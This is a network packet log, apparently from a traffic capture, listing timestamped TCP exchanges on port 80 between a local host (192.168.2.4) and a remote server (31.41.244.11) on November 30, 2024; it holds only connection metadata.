Nov 30, 2024 04:06:12.215240002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.215291977 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.216087103 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.216152906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.216206074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.216253996 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.216986895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.217039108 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.217108965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.217153072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.217931986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.217984915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.218027115 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.218065023 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.218880892 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.218974113 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.218978882 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.219022989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.219799995 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.219850063 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.219917059 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.219960928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.220743895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.220789909 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.220849037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.220892906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.221668959 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.221729994 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.221810102 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.221853971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.222628117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.222687006 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.222726107 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.222778082 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.223566055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.223615885 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.223655939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.223706961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.224503040 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.224554062 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.224658966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.224700928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.225446939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.225531101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.225550890 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.225580931 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.226392031 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.226443052 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.226492882 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.226540089 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.227340937 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.227387905 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.227449894 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.227760077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.228270054 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.228328943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.228374004 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.228425026 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.229195118 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.229254961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.229290962 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.229338884 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.230133057 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.230186939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.230237007 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.230285883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.231081009 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.231129885 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.231172085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.231220007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.232011080 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.232053995 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.232080936 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.232120991 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.232952118 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.233000994 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.233103037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.233149052 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.233896017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.233942032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.234005928 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.234057903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.234848976 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.234909058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.234925985 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.234973907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.235785961 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.235847950 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.235888958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.235938072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.236720085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.236772060 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.236870050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.236916065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.237646103 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.237703085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.237746000 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.237782955 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.238579035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.238625050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.238703966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.238749027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.239543915 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.239587069 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.239634037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.239680052 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.240485907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.240541935 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.240603924 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.240649939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.241425991 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.241488934 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.241539001 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.241590023 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.242366076 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.242417097 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.242489100 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.242537022 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.243283033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.243330002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.243386984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.243441105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.244225979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.244271040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.244342089 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.244385958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.245165110 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.245207071 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.245302916 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.245346069 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.246117115 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.246164083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.246226072 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.246273041 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.247039080 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.247093916 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.247174978 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.247227907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.247993946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.248045921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.248090029 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.248137951 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.248927116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.248996019 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.249037027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.249085903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.249882936 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.249921083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.249996901 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.250391960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.250809908 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.250858068 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.250916004 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.250957966 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.251746893 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.251828909 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.251856089 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.251899958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.252701998 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.252762079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.252851963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.252903938 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.253595114 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.253654003 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.253689051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.253736973 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.340080976 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.340157986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.340178967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.340218067 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.340679884 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.340758085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.340799093 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.340846062 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.341487885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.341536045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.341586113 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.341630936 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.342390060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.342436075 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.400053024 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.400115967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.400177002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.400223017 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.400569916 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.400635958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.400679111 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.400731087 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.401463032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.401513100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.401563883 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.401609898 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.402405977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.402458906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.402503967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.402549982 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.403348923 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.403398037 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.403444052 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.403487921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.404264927 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.404309034 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.404376984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.404422045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.405234098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.405276060 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.405349970 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.405396938 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.406155109 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.406203985 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.406308889 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.406352997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.407082081 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.407128096 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.407205105 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.407250881 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.408021927 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.408067942 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.408135891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.408181906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.408965111 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.409010887 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.409068108 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.409113884 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.409929037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.409977913 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.410015106 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.410060883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.410852909 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.410897970 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.410955906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.410998106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.411787033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.411833048 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.411895037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.411941051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.412725925 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.412779093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.412866116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.412909985 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.413676977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.413721085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.413774967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.413827896 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.414589882 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.414633989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.414702892 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.414747000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.415529013 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.415582895 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.415642023 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.415685892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.416476011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.416520119 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.416583061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.416627884 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.417428017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.417473078 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.417541981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.417586088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.418365002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.418411016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.418442965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.418487072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.419322014 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.419364929 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.419394016 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.419437885 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.420236111 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.420280933 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.420346022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.420391083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.421186924 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.421241999 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.421277046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.421323061 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.422110081 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.422158957 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.422221899 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.422262907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.423043966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.423093081 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.423158884 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.423203945 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.423986912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.424029112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.424088001 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.424132109 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.424935102 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.424983025 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.425029039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.425080061 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.425894022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.425945044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.425995111 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.426043034 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.426814079 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.426858902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.426928997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.426989079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.427768946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.427815914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.427855015 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.427897930 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.428709984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.428751945 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.428755999 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.428787947 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.429634094 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.429678917 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.429722071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.429764986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.430615902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.430661917 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.430720091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.430764914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.431525946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.431570053 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.431626081 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.431670904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.432423115 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.432468891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.432549000 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.432594061 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.433368921 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.433428049 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.433471918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.433517933 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.434354067 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.434400082 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.434427023 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.434493065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.435252905 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.435303926 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.435376883 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.435420990 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.436186075 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.436229944 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.436295986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.436340094 CET	49765	80	192.168.2.4	31.41.244.11
